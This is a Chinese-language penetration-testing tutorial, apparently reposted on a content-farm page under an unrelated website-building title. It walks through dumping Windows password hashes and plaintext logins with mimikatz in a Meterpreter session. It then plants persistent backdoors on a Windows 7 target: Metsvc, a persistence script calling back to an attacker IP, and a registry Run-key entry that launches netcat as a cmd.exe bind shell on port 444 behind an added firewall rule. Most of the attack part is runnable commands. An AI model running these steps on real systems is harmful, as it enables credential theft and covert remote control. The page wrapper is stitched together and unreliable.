做网站 先上线再调整可以做pos机的网站
- 作者: 五速梦信息网
- 时间: 2026年04月18日 09:59
当前位置: 首页 > news >正文
做网站 先上线再调整,可以做pos机的网站,家具网站开发报告,门户网站代码结构内网渗透系列-mimikatz的使用以及后门植入 文章目录 内网渗透系列-mimikatz的使用以及后门植入前言mimikatz的使用后门植入 msf永久后门植入 #xff08;1#xff09;Meterpreter后门#xff1a;Metsvc#xff08;2#xff09;Meterpreter后门#xff1a;Persistence NC后…内网渗透系列-mimikatz的使用以及后门植入 文章目录 内网渗透系列-mimikatz的使用以及后门植入前言mimikatz的使用后门植入 msf永久后门植入 1Meterpreter后门Metsvc2Meterpreter后门Persistence NC后门 后记 前言
内网渗透最重要的环节就是权限维持当我们获取到靶机的权限后当对方的机器关机后我们所获取的会话也会跟着消失也就是说当他重新开启后我们又得重新进行信息收集漏洞利用又重复着上一个渗透的过程工程量就很大了。所以为了能一直维持着权限我们需要进行权限的维持保持着下一次靶机登录时我只需要监听端口就可以获取对方的shell了。这就是我们今天说的后门植入的内容了。
mimikatz的使用
讲解后门植入的内容之前我们先简单介绍一下mimikatz的用法实际场景中我们可以反弹shell到cs中进行横向移动使用自带的提权和mimikatz的模块进行获取用户的密码。
mimikatz的使用 使用规则是必须是管理员或者system权限才可以使用 首先拿到会话以及system权限后在加载插件 load mimikatz help mimikatz
msv导出哈希值 用户名和密码哈希值
wdigest 直接获取的账号的明文密码
kerberos信息 也可以找出账号的明文密码
原来的命令 mimakatz_commend -h mimakatz_commend -f
mimakatz_commend -f a::写错误的指令报出帮助信息 会出现各个模块比如 mimakatz_commend system:: mimakatz_commend system::user
获取哈希值 mimakatz_commend samdump::hashes
mimakatz_commend -f process::list列出当前的进程信息
mimakatz_commend -f service::list列出当前的服务进程
想在靶机上打开一个cmd的窗口就输入 mimakatz_commend -f nogpo:: mimakatz_commend -f nogpo::cmd mimakatz_commend -f nogpo::regedit
获取认证信息 mimakatz_commend -f sekurlsa:: mimakatz_commend -f sekurlsa::wdigest获取明文信息 mimakatz_commend -f sekurlsa::logonPasswords获取用户的登录密码
权限提升 mimakatz_commend -f privilege:: mimakatz_commend -f privilege::debug
破解扫雷游戏 mimakatz_commend -f minesweeper::infos
后门植入
msf永久后门植入
讲解方法之前我们先了解一下为什么要生成后门
1.meterpretere shell运行与内存中重启后失效2.避免重复性的渗透工作3.漏洞修复后仍旧可就维持控制
两种方法生成后门
1Meterpreter后门Metsvc
通过服务启动
进入会话后 run metsvc -h run metsvc -A //设定端口上传后门文件 会在以下路径生成服务 C:\Users\zhian2\AppData\Local\Temp\tjPfsdnGycGdiM
这个服务是上传上去了但没有显示在进程中
我来讲解一下步骤吧 首先进入会话 上传成功我们到靶机上查看上传的文件 服务已启动但是在win7上执行metsvc.exe执行不了。
在这里我由于关掉了防火墙后uac所以直接就get到system权限之前得不到系统权限是因为uac和防火墙的原因所以想要提权的话还是得绕过uac或者直接上线cs直接利用模块获取system的权限。
2Meterpreter后门Persistence
通过启动型启动 特性定期回连系统 启动是回连自动运行 Run persistence -A -S -U -i 20 -p 4321 -r 192.168.101.102
Run persistence -A -X -i 20 -p 4321 -r 192.168.101.102 其中-A是生成的程序-X是自动连接-i是延时时间-p是对应的端口-r是kali的ip地址
在这里给大家介绍第二种方法比较好用重启之后还是可以回连会话的。我们来尝试一下步骤如下 run persistence -A -X -i 20 -p 666 -r 192.168.101.102 background jobs 过了20秒后又会返回一个会话 我们删掉进程后过了20秒他有返回了一个会话了 sessions -k 9 我们就获得了system权限了 我们重启后等待20秒输入sessions查看会话就会发现出现了新的会话了或者再等一会他自己就会回连一个会话了。 我们输入sessions -i 13获取会话getuidgetsystem最终获得了system权限了。
NC后门
我先把大概的步骤给大家看一下接下来就要开始演示了。 3NC后门 上传nc Upload /rootnc.exe C:\windows\system32
修改注册表
枚举注册表键值 reg enumkey -k HKLM\software\microsoft\windows\currentversion\run在当前主键下增加一个nc 键值 reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’查看nc键值 reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc
设置防火墙
开启有一个cmd通道 execute -f cmd -i -H查看防火墙状态 Netsh firewall show opmode添加防火墙规则允许444端口通过 netsh firewall add portopening TCP 444 “Service Firewall” ENABLE查看端口状态 Netsh firewall show portopening
开始连接 nc -v ip port
具体步骤如下 首先在kali的桌面上传一个nc.exe或者放在/home/zhian/nc.exe upload /home/zhian/nc.exe c:\windows\system32 枚举注册表键值 reg enumkey -k HKLM\software\microsoft\windows\currentversion\run 在当前主键下增加一个nc 键值 reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’-d表示要执行的内容 查看nc键值 reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc execute -f cmd -i -H-H表示要开启一个cmd的窗口
查看防火墙状态 Netsh firewall show opmode 添加防火墙规则允许444端口通过 netsh firewall add portopening TCP 444 “Service Firewall” ENABLE
查看端口状态 Netsh firewall show portopening 我们重启win7后进程中就出现了nc.exe的进程我们只需要监听即可 在kali上输入nc 192.168.101.102 444就返回shell了 实验到这里就结束了后续有学习内网渗透方面的知识会给大家更新的大家要好好复习呀。
后记
这只是内网渗透的冰山一角也只是权限维持的一部分。内网如果要更深入的话会涉及很多横向移动权限提升方面的知识。最常见的就是路由和代理配置的问题在往期文章都有提及到大家可以看看我往期写的文章好好复习一下吧。
- 上一篇: 做网站 外文参考文献网站建设冷色调
- 下一篇: 做网站 需求网站维护员是做什么的
相关文章
-
做网站 外文参考文献网站建设冷色调
做网站 外文参考文献网站建设冷色调
- 技术栈
- 2026年04月18日
-
做网站 融资access做网站服务器
做网站 融资access做网站服务器
- 技术栈
- 2026年04月18日
-
做网站 模板营销相关网站
做网站 模板营销相关网站
- 技术栈
- 2026年04月18日
-
做网站 需求网站维护员是做什么的
做网站 需求网站维护员是做什么的
- 技术栈
- 2026年04月18日
-
做网站 域名不属于公司app开发收费价目表
做网站 域名不属于公司app开发收费价目表
- 技术栈
- 2026年04月18日
-
做网站 怎么选择公司企业怎样建网站
做网站 怎么选择公司企业怎样建网站
- 技术栈
- 2026年04月18日
